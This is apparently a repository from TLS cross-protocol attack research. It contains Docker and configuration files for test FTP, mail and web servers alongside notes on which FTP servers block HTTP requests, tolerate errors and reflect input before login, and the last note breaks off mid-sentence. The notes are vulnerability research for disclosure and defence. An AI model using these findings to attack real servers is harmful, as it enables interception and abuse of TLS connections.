--prefix=/usr 24 | RUN make 25 | RUN mv src/server/filezilla-server /bin/ 26 | 27 | CMD ["filezilla-server"] -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-filezillaserver -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | filezillaserver: 8 | image: tls-filezillaserver 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - filezillaserver 13 | command: [ "-connect", "filezillaserver:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/filezilla-server/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-openssl 2 | 3 | 4 | # RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 5 | # RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 6 | RUN apk add pcre-dev zlib-dev bsd-compat-headers 7 | 8 | ARG VERSION=1.4.63 9 | WORKDIR /build 10 | RUN wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${VERSION}.tar.gz 11 | RUN tar -xvf lighttpd-${VERSION}.tar.gz 12 | WORKDIR /build/lighttpd-${VERSION} 13 | RUN ./autogen.sh 14 | RUN ./configure -C --with-openssl 15 | RUN make check 16 | RUN make install 17 | 18 | ADD lighttpd.conf /etc/lighttpd.conf 19 | 20 | CMD ["lighttpd", "-D", "-f", "/etc/lighttpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/Dockerfile-mbedtls: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | 3 | 4 | # RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 5 | # RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 6 | RUN apk add mbedtls-dev pcre-dev zlib-dev bsd-compat-headers 7 | 8 | ARG VERSION=1.4.63 9 | WORKDIR /build 10 | RUN wget https://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${VERSION}.tar.gz 11 | RUN tar -xvf lighttpd-${VERSION}.tar.gz 12 | WORKDIR /build/lighttpd-${VERSION} 13 | RUN ./autogen.sh 14 | RUN ./configure -C --with-mbedtls 15 | RUN make check 16 | RUN make install 17 | 18 | ADD lighttpd-mbedtls.conf /etc/lighttpd.conf 19 | 20 | CMD ["lighttpd", "-D", "-f", "/etc/lighttpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-lighttpd-openssl 2 | docker build . -t tls-lighttpd-mbedtls -f Dockerfile-mbedtls -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | lighttpd-openssl: 8 | image: tls-lighttpd-openssl 9 | lighttpd-mbedtls: 10 | image: tls-lighttpd-mbedtls 11 | scanner: 12 | image: tlsscanner 13 | depends_on: 14 | - lighttpd-openssl 15 | command: [ "-connect", "lighttpd-openssl:443", "-server_name", "tls-server.com", "-scanDetail", "QUICK" ] 16 | scanner2: 17 | image: tlsscanner 18 | depends_on: 19 | - lighttpd-mbedtls 20 | command: [ "-connect", "lighttpd-mbedtls:443", "-server_name", "tls-server.com", "-scanDetail", "QUICK" ] -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/lighttpd-mbedtls.conf: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Default lighttpd.conf for Gentoo. 3 | # $Header: /var/cvsroot/gentoo-x86/www-servers/lighttpd/files/conf/lighttpd.conf,v 1.3 2005/09/01 14:22:35 ka0ttic Exp $ 4 | ############################################################################### 5 | 6 | # {{{ variables 7 | var.basedir = "/var/www/localhost" 8 | #var.logdir = "/var/log/lighttpd" 9 | var.statedir = "/var/lib/lighttpd" 10 | # }}} 11 | 12 | # {{{ modules 13 | # At the very least, mod_access and mod_accesslog should be enabled. 14 | # All other modules should only be loaded if necessary. 15 | # NOTE: the order of modules is important. 16 | server.modules = ( 17 | 18 | "mod_access", 19 | "mod_mbedtls", 20 | 21 | "mod_accesslog" 22 | ) 23 | 24 | server.document-root = var.basedir + "/htdocs" 25 | server.pid-file = "/run/lighttpd.pid" 26 | 27 | 28 | server.indexfiles = ("index.php", "index.html", 29 | "index.htm", "default.htm") 30 | 31 | server.follow-symlink = "enable" 32 | 33 | static-file.exclude-extensions = (".php", ".pl", ".cgi", ".fcgi") 34 | 35 | url.access-deny = ("~", ".inc") 36 | 37 | $SERVER["socket"] == ":443" { 38 | ssl.engine = "enable" 39 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 40 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 41 | ssl.cipher-list = "EECDH+AESGCM:AES256+EECDH:CHACHA20:!SHA1:!SHA256:!SHA384" 42 | $HTTP["host"] == "tls-server.com" { 43 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 44 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 45 | } 46 | } 47 | 48 | 49 | 50 | 51 | #ssl.openssl.ssl-conf-cmd = ("MinProtocol" => "TLSv1.2") 52 | #ssl.openssl.ssl-conf-cmd += ("Options" => "-ServerPreference") 53 | #ssl.openssl.ssl-conf-cmd += ("CipherString" => "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384") -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/lighttpd.conf: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Default lighttpd.conf for Gentoo. 3 | # $Header: /var/cvsroot/gentoo-x86/www-servers/lighttpd/files/conf/lighttpd.conf,v 1.3 2005/09/01 14:22:35 ka0ttic Exp $ 4 | ############################################################################### 5 | 6 | # {{{ variables 7 | var.basedir = "/var/www/localhost" 8 | #var.logdir = "/var/log/lighttpd" 9 | var.statedir = "/var/lib/lighttpd" 10 | # }}} 11 | 12 | # {{{ modules 13 | # At the very least, mod_access and mod_accesslog should be enabled. 14 | # All other modules should only be loaded if necessary. 15 | # NOTE: the order of modules is important. 16 | server.modules = ( 17 | 18 | "mod_access", 19 | "mod_openssl", 20 | 21 | "mod_accesslog" 22 | ) 23 | 24 | server.document-root = var.basedir + "/htdocs" 25 | server.pid-file = "/run/lighttpd.pid" 26 | 27 | 28 | server.indexfiles = ("index.php", "index.html", 29 | "index.htm", "default.htm") 30 | 31 | server.follow-symlink = "enable" 32 | 33 | static-file.exclude-extensions = (".php", ".pl", ".cgi", ".fcgi") 34 | 35 | url.access-deny = ("~", ".inc") 36 | 37 | $SERVER["socket"] == ":443" { 38 | ssl.engine = "enable" 39 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 40 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 41 | ssl.cipher-list = "EECDH+AESGCM:AES256+EECDH:CHACHA20:!SHA1:!SHA256:!SHA384" 42 | $HTTP["host"] == "tls-server.com" { 43 | ssl.pemfile = "/etc/ssl/cert-data/tls-server.com-chain.crt" 44 | ssl.privkey = "/etc/ssl/cert-data/tls-server.com.key" 45 | } 46 | } 47 | 48 | 49 | #ssl.openssl.ssl-conf-cmd = ("MinProtocol" => "TLSv1.2") 50 | #ssl.openssl.ssl-conf-cmd += ("Options" => "-ServerPreference") 51 | #ssl.openssl.ssl-conf-cmd += ("CipherString" => "ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384") -------------------------------------------------------------------------------- /evaluation-servers/lighttpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage as tls-nginx 2 | ARG VERSION=1.21.4 3 | RUN apk add pcre-dev openssl-dev 4 | WORKDIR /build 5 | RUN wget http://nginx.org/download/nginx-${VERSION}.tar.gz 6 | RUN tar -xvf nginx-${VERSION}.tar.gz 7 | WORKDIR /build/nginx-${VERSION} 8 | #ADD patch.diff /build/nginx-${VERSION}/patch.diff 9 | #RUN patch src/http/modules/ngx_http_ssl_module.c 10 | RUN mkdir /usr/local/nginx 11 | RUN mkdir /usr/local/nginx/logs 12 | RUN ./configure --conf-path=/etc/nginx.conf --with-http_ssl_module --without-http_gzip_module --with-http_v2_module 13 | RUN make 14 | ADD nginx.conf /etc/nginx.conf 15 | RUN mv objs/nginx /usr/bin/nginx 16 | CMD ["nginx", "-g", "daemon off;"] 17 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-nginx 2 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | nginx: 8 | image: tls-nginx 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - nginx 13 | command: [ "-connect", "nginx:4433", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] 14 | -------------------------------------------------------------------------------- /evaluation-servers/nginx/nginx.conf: -------------------------------------------------------------------------------- 1 | worker_processes auto; 2 | 3 | events { 4 | worker_connections 1024; 5 | } 6 | 7 | http { 8 | server { 9 | listen 4433 ssl http2; 10 | server_name tls-server.com; 11 | 12 | ssl_certificate /etc/ssl/cert-data/tls-server.com-chain.crt; 13 | ssl_certificate_key /etc/ssl/cert-data/tls-server.com.key; 14 | ssl_protocols TLSv1.2 TLSv1.3; 15 | 16 | location / { 17 | return 404; 18 | } 19 | } 20 | } -------------------------------------------------------------------------------- /evaluation-servers/nginx/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimagedebian 2 | ARG DEBIAN_FRONTEND=noninteractive 3 | RUN apt-get update && apt-get install -yq opensmtpd 4 | ADD smtpd.conf /etc/ 5 | RUN chmod 600 /etc/ssl/cert-data/* 6 | CMD ["smtpd", "-d"] -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-opensmtpd 2 | -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | opensmtpd: 8 | image: tls-opensmtpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - opensmtpd 13 | command: [ "-connect", "opensmtpd:465", "-server_name", "tls-server.com", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/opensmtpd/smtpd.conf: -------------------------------------------------------------------------------- 1 | # $OpenBSD: smtpd.conf,v 1.10 2018/05/24 11:40:17 gilles Exp $ 2 | 3 | # This is the smtpd server system-wide configuration file. 4 | # See smtpd.conf(5) for more information. 5 | 6 | table aliases file:/etc/aliases 7 | 8 | pki tls-server.com cert "/etc/ssl/cert-data/tls-server.com-chain.crt" 9 | pki tls-server.com key "/etc/ssl/cert-data/tls-server.com.key" 10 | 11 | # To accept external mail, replace with: listen on all 12 | # 13 | #listen on 0.0.0.0 smtps 14 | 15 | listen on 0.0.0.0 tls pki tls-server.com 16 | listen on 0.0.0.0 port 465 smtps pki tls-server.com 17 | listen on 0.0.0.0 port 587 tls-require pki tls-server.com 18 | 19 | action "local" maildir alias 20 | action "relay" relay 21 | 22 | # Uncomment the following to accept external mail for domain "example.org" 23 | # 24 | # match from any for domain "example.org" action "local" 25 | match for local action "local" 26 | match from local for any action "relay" -------------------------------------------------------------------------------- /evaluation-servers/postfix/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage as tls-apache 2 | RUN apk add postfix 3 | COPY main.cf /etc/postfix/ 4 | COPY master.cf /etc/postfix/ 5 | 6 | CMD ["/usr/sbin/postfix", "start-fg"] -------------------------------------------------------------------------------- /evaluation-servers/postfix/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-postfix 2 | -------------------------------------------------------------------------------- /evaluation-servers/postfix/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | postfix: 8 | image: tls-postfix 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - postfix 13 | command: [ "-connect", "postfix:465", "-server_name", "tls-server.com", "-starttls", "SMTP", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/postfix/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/proftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | ARG VERSION=1.3.8rc2 3 | ARG TLS_SERVER_NAME=tls-server.com 4 | RUN apk add openssl-dev 5 | WORKDIR /build 6 | RUN wget https://github.com/proftpd/proftpd/archive/refs/tags/v${VERSION}.tar.gz 7 | RUN tar -xvf v${VERSION}.tar.gz 8 | WORKDIR /build/proftpd-${VERSION} 9 | RUN ./configure --with-modules=mod_tls --with-virtualhosts 10 | RUN make 11 | RUN mv proftpd /bin/ 12 | 13 | #fix errors on start 14 | RUN mkdir /usr/local/var/ 15 | 16 | RUN echo "tls-server.com" > /etc/hostname 17 | RUN echo "tls-server.com 127.0.0.1" > /etc/hosts 18 | 19 | ADD proftpd.conf /etc/proftpd.conf 20 | 21 | 22 | CMD ["proftpd", "-d", "10", "-n" , "-c" , "/etc/proftpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/proftpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-proftpd -------------------------------------------------------------------------------- /evaluation-servers/proftpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | tls-server.com: 8 | image: tls-proftpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - tls-server.com 13 | command: [ "-connect", "tls-server.com:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/proftpd/proftpd.conf: -------------------------------------------------------------------------------- 1 | ScoreboardFile /dev/null 2 | ServerType standalone 3 | UseReverseDNS off 4 | 5 | TLSEngine on 6 | TLSLog /usr/local/var/tls.log 7 | TLSProtocol TLSv1.2 8 | TLSRequired on 9 | TLSRSACertificateFile /etc/ssl/cert-data/tls-server.com-chain.crt 10 | TLSRSACertificateKeyFile /etc/ssl/cert-data/tls-server.com.key 11 | TLSVerifyClient off 12 | TLSRenegotiate none 13 | TLSNextProtocol on 14 | TLSOptions StdEnvVars 15 | 16 | # This is a basic ProFTPD configuration file (rename it to 17 | # 'proftpd.conf' for actual use. It establishes a single server 18 | # and a single anonymous login. It assumes that you have a user/group 19 | # "nobody" and "ftp" for normal operation and anon. 20 | 21 | ServerName "tls-server.com" 22 | 23 | DefaultServer on 24 | 25 | # Port 21 is the standard FTP port. 26 | Port 21 27 | 28 | # Bar use of SITE CHMOD by default 29 | 30 | DenyAll 31 | 32 | 33 | # A basic anonymous configuration, no upload directories. If you do not 34 | # want anonymous users, simply delete this entire section. 35 | 36 | User ftp 37 | Group ftp 38 | 39 | # We want clients to be able to login with "anonymous" as well as "ftp" 40 | UserAlias anonymous ftp 41 | 42 | # Limit the maximum number of anonymous logins 43 | MaxClients 10 44 | 45 | # We want 'welcome.msg' displayed at login, and '.message' displayed 46 | # in each newly chdired directory. 47 | DisplayLogin welcome.msg 48 | DisplayChdir .message 49 | 50 | # Limit WRITE everywhere in the anonymous chroot 51 | 52 | DenyAll 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /evaluation-servers/proftpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | ARG VERSION=1.0.49 3 | RUN apk add openssl-dev 4 | WORKDIR /build 5 | RUN wget https://github.com/jedisct1/pure-ftpd/releases/download/${VERSION}/pure-ftpd-${VERSION}.tar.gz 6 | RUN tar -xvf pure-ftpd-${VERSION}.tar.gz 7 | WORKDIR /build/pure-ftpd-${VERSION} 8 | RUN ./configure --with-tls --without-capabilities 9 | RUN make 10 | RUN mv src/pure-ftpd /bin/ 11 | 12 | RUN mkdir /etc/ssl/private 13 | 14 | RUN cat /etc/ssl/cert-data/tls-server.com.key >> /etc/ssl/private/pure-ftpd.pem 15 | RUN cat /etc/ssl/cert-data/tls-server.com-chain.crt >> /etc/ssl/private/pure-ftpd.pem 16 | 17 | CMD ["pure-ftpd", "-Y" , "2"] -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-pureftpd -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | pureftpd: 8 | image: tls-pureftpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - pureftpd 13 | command: [ "-connect", "pureftpd:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/pure-ftpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/sendmail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimagedebian 2 | 3 | RUN apt-get update && apt-get install -yq sendmail openssl libsasl2-2 sasl2-bin 4 | 5 | RUN echo "tls-server.com" >> /etc/hostname 6 | RUN echo "tls-server.com 127.0.0.1" >> /etc/hosts 7 | 8 | RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/sendmail.mc 9 | RUN echo "include(\`/etc/mail/tls/starttls.m4')dnl" >> /etc/mail/submit.mc 10 | 11 | RUN echo "define(\`confCACERT_PATH', \`/etc/ssl/cert-data/')dnl" >> /etc/mail/sendmail.mc 12 | RUN echo "define(\`confLOG_LEVEL', \`14')" >> /etc/mail/sendmail.mc 13 | 14 | RUN echo "define(\`SMART_HOST', \`tls-server.com')dnl" >> /etc/mail/sendmail.mc 15 | 16 | RUN echo "define(\`confSERVER_CERT', \`/etc/ssl/cert-data/tls-server.com-chain.crt')dnl" >> /etc/mail/sendmail.mc 17 | RUN echo "define(\`confSERVER_KEY', \`/etc/ssl/cert-data/tls-server.com.key')dnl" >> /etc/mail/sendmail.mc 18 | RUN echo "define(\`confCLIENT_CERT', \`/etc/ssl/cert-data/tls-server.com-chain.crt')dnl" >> /etc/mail/sendmail.mc 19 | RUN echo "define(\`confCLIENT_KEY', \`/etc/ssl/cert-data/tls-server.com.key')dnl" >> /etc/mail/sendmail.mc 20 | 21 | RUN echo "GreetPause:192.16 0" >> /etc/mail/access 22 | RUN echo "ClientRate:172.16 0" >> /etc/mail/access 23 | RUN echo "GreetPause:172.16 0" >> /etc/mail/access 24 | 25 | RUN sed -i 's/127.0.0.1/0.0.0.0/' /etc/mail/sendmail.mc 26 | 27 | RUN chmod 600 /etc/ssl/cert-data/* 28 | 29 | RUN yes 'y' | sendmailconfig 30 | 31 | RUN chmod 777 /etc/ssl/cert-data/tls-server.com-chain.crt 32 | RUN chmod 777 /etc/ssl/cert-data/tls-server.com.key 33 | 34 | USER sendmail 35 | #CMD ["exim", "-bd", "-d-all+pid", "-q30m"] 36 | ADD start.sh /root/ 37 | RUN chmod +x /root/start.sh 38 | CMD ["/root/start.sh"] 39 | #CMD ["sendmail", "-bD", "-d0.14"] -------------------------------------------------------------------------------- /evaluation-servers/sendmail/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-sendmail 2 | -------------------------------------------------------------------------------- /evaluation-servers/sendmail/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | tls-sendmail: 8 | image: tls-sendmail 9 | hostname: tls-server.com 10 | container_name: tls-server.com 11 | scanner: 12 | image: tlsscanner 13 | depends_on: 14 | - tls-sendmail 15 | command: [ "-connect", "tls-server.com:25", "-server_name", "tls-server.com", "-starttls", "SMTP", "-scanDetail", "QUICK"] 16 | restart: always -------------------------------------------------------------------------------- /evaluation-servers/sendmail/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/sendmail/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # /etc/init.d/sendmail start 3 | # echo Started sendmail 4 | # 5 | 6 | cat /etc/hostname 7 | echo "tls-server" > /etc/hostname 8 | echo "127.0.0.1 tls-server.com tls-server localdev localhost" > /etc/hosts 9 | 10 | touch /var/log/mail.info 11 | sendmail -bD -d0.14 -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM tls-baseimage 2 | ARG VERSION=3.0.5 3 | RUN apk add vsftpd 4 | #RUN apk add openssl-dev 5 | #WORKDIR /build 6 | #RUN wget https://security.appspot.com/downloads/vsftpd-${VERSION}.tar.gz 7 | #RUN tar -xvf vsftpd-${VERSION}.tar.gz 8 | #WORKDIR /build/vsftpd-${VERSION} 9 | #RUN ./configure --with-modules=mod_tls --with-virtualhosts 10 | #RUN make 11 | #RUN mv proftpd /bin/ 12 | 13 | RUN mkdir /var/ftp 14 | RUN chmod 777 /var/ftp 15 | 16 | RUN echo "tls-server.com" > /etc/hostname 17 | RUN echo "tls-server.com 127.0.0.1" > /etc/hosts 18 | 19 | ADD vsftpd.conf /etc/vsftpd/vsftpd.conf 20 | 21 | ADD start.sh /root/ 22 | RUN chmod +x /root/start.sh 23 | CMD ["/root/start.sh"] 24 | 25 | #CMD ["/usr/sbin/vsftpd", "/etc/vsftpd/vsftpd.conf"] -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/build.sh: -------------------------------------------------------------------------------- 1 | docker build . -t tls-vsftpd -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | vsftpd: 8 | image: tls-vsftpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - vsftpd 13 | command: [ "-connect", "vsftpd:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #echo test 3 | touch /var/log/vsftpd.log 4 | /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf & tail -f /var/log/vsftpd.log 5 | #rc-update add vsftpd default 6 | #rc-service vsftpd restart 7 | #tail -f /var/log/vsftpd.log -------------------------------------------------------------------------------- /exploits/ftp/01-pureftpd.md: -------------------------------------------------------------------------------- 1 | ## Pure-FTPd 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | Pure-FTPd | 1.0.47, 1.0.49 6 | 7 | The homepage of PureFTPd is https://www.pureftpd.org/. 8 | 9 | We used a [Docker image][1] by the GitHub user `jedisct1`, based on 10 | another one by the user `stilliard`. 11 | 12 | [1]: https://github.com/jedisct1/pure-ftpd/ 13 | 14 | Pure-FTPd requires capability support, which is not available in 15 | Docker. So, a special Docker image is used which compiles pure-ftpd 16 | from source with that option disabled. 17 | 18 | ``` 19 | $ docker run -d --name ftpd_server -p 21:21 -p 30000-30009:30000-30009 -e "PUBLICHOST=localhost" stilliard/pure-ftpd 20 | ``` 21 | 22 | However, we also tested on NixOS with version 1.0.49 and could 23 | reproduce the same results with that version: 24 | 25 | ``` 26 | $ nix-shell -p pure-ftpd; sudo pure-ftpd 27 | ``` 28 | 29 | ### HTTP Detection 30 | 31 | Pure-FTPd detects and blocks HTTP POST requests. 32 | 33 | This protection is disabled if PureFTPd is compiled with the flag 34 | `--enable-minimal` (which is recommended to be used for embedded 35 | systems). Extract from the [source code][2]: 36 | 37 | [2]: https://github.com/jedisct1/pure-ftpd/blob/4828633d9cb42cd77d764e7d1cb3d0c04c5df001/src/ftp_parser.c#L429 38 | 39 | ``` 40 | #ifndef MINIMAL 41 | } else if (!strcmp(cmd, "connect") || 42 | !strcmp(cmd, "delete") || 43 | !strcmp(cmd, "get") || 44 | !strcmp(cmd, "head") || 45 | !strcmp(cmd, "options") || 46 | !strcmp(cmd, "post") || 47 | !strcmp(cmd, "put")) { 48 | die(500, LOG_INFO, "HTTP command: [%s]", cmd); 49 | } else if (!strcmp(cmd, "help")) { 50 | goto help_site; 51 | #endif 52 | ``` 53 | 54 | ### Error Tolerance 55 | 56 | Yes, at least 100 errors allowed. 57 | 58 | ### Reflection 59 | 60 | Yes, pre-auth. 61 | 62 | ``` 63 | TYPE 64 | 504-Unknown TYPE: 65 | ``` 66 | 67 | ``` 68 | USER 69 | 331 User OK. Password required 70 | ``` 71 | 72 | ### Additional Notes 73 | 74 | Pure-FTPd has support for SNI since version 1.0.48 (March 25, 2019). 75 | -------------------------------------------------------------------------------- /exploits/ftp/02-proftpd.md: -------------------------------------------------------------------------------- 1 | ## ProFTPD 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | ProFTPD | 1.3.7a 6 | 7 | The homepage of ProFTPD is http://www.proftpd.org/. 8 | 9 | We used a [ProFTPD Docker image][1] by GitHub user "instantlinux". This was started with the command: 10 | 11 | ``` 12 | docker run -d --name ftpd_server -p 21:21 -p 30000-30009:30000-30009 -e "PASV_ADDRESS=localhost" instantlinux/proftpd 13 | ``` 14 | 15 | [1]: https://github.com/instantlinux/docker-tools.git 16 | 17 | ### HTTP Detection 18 | 19 | Yes, ProFTPD since version 1.3.5e detects POST requests as a 20 | mitigation to cross-protocol attacks reported by Jann Horn. 21 | 22 | ``` 23 | POST / HTTP/1.1 24 | Connection closed by foreign host. 25 | 26 | Connection-Type: keep-alive 27 | 500 CONNECTION-TYPE: not understood 28 | ``` 29 | 30 | ### Error Tolerance 31 | 32 | Yes, at least 100 errors allowed. 33 | 34 | ### Reflection 35 | 36 | Yes, pre-auth. 37 | 38 | ``` 39 | TYPE 40 | 504 TYPE not implemented for '' parameter 41 | ``` 42 | 43 | ``` 44 | USER 45 | 331 Password required for 46 | ``` 47 | -------------------------------------------------------------------------------- /exploits/ftp/03-microsoft-ftp.md: -------------------------------------------------------------------------------- 1 | ## Pure-FTPd 2 | 3 | Name | Version 4 | :------------------------|:------------------------------- 5 | Microsoft IIS FTP Server | IIS 10.0.19041.322 (Windows 10) 6 | 7 | Microsoft IIS FTP Server is included with the Windows operating system. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request. 12 | 13 | ### Error Tolerance 14 | 15 | Yes, at least 100 errors allowed. 16 | 17 | ### Reflection 18 | 19 | Yes, pre-auth. For example: 20 | 21 | ``` 22 | LANG 23 | 502 Language not supported. 24 | ``` 25 | 26 | ``` 27 | HELP 28 | 501 'HELP ': parameter not understood. 29 | ``` 30 | -------------------------------------------------------------------------------- /exploits/ftp/04-vsftpd.md: -------------------------------------------------------------------------------- 1 | ## vsftpd 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | vsftpd | 3.0.3 6 | 7 | The homepage of vsftpd is https://security.appspot.com/vsftpd.html. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request pre-auth. 12 | 13 | There is a detection of POST requests post-auth, but it that is 14 | ineffective in mitigating cross-protocol attacks. 15 | 16 | ``` 17 | POST / HTTP/1.1 18 | 530 Please login with USER and PASS. 19 | USER anonymous 20 | 230 Login successful. 21 | POST / HTTP/1.1 22 | 500 HTTP protocol commands not allowed. 23 | Connection closed by foreign host. 24 | ``` 25 | 26 | ### Error tolerance 27 | 28 | Yes, at least 100 errors allowed. 29 | 30 | ### Reflection 31 | 32 | No reflections found pre-auth. 33 | 34 | Post-auth, only post-for user with write permission. Using a bypass by [OWASP][1]: 35 | 36 | 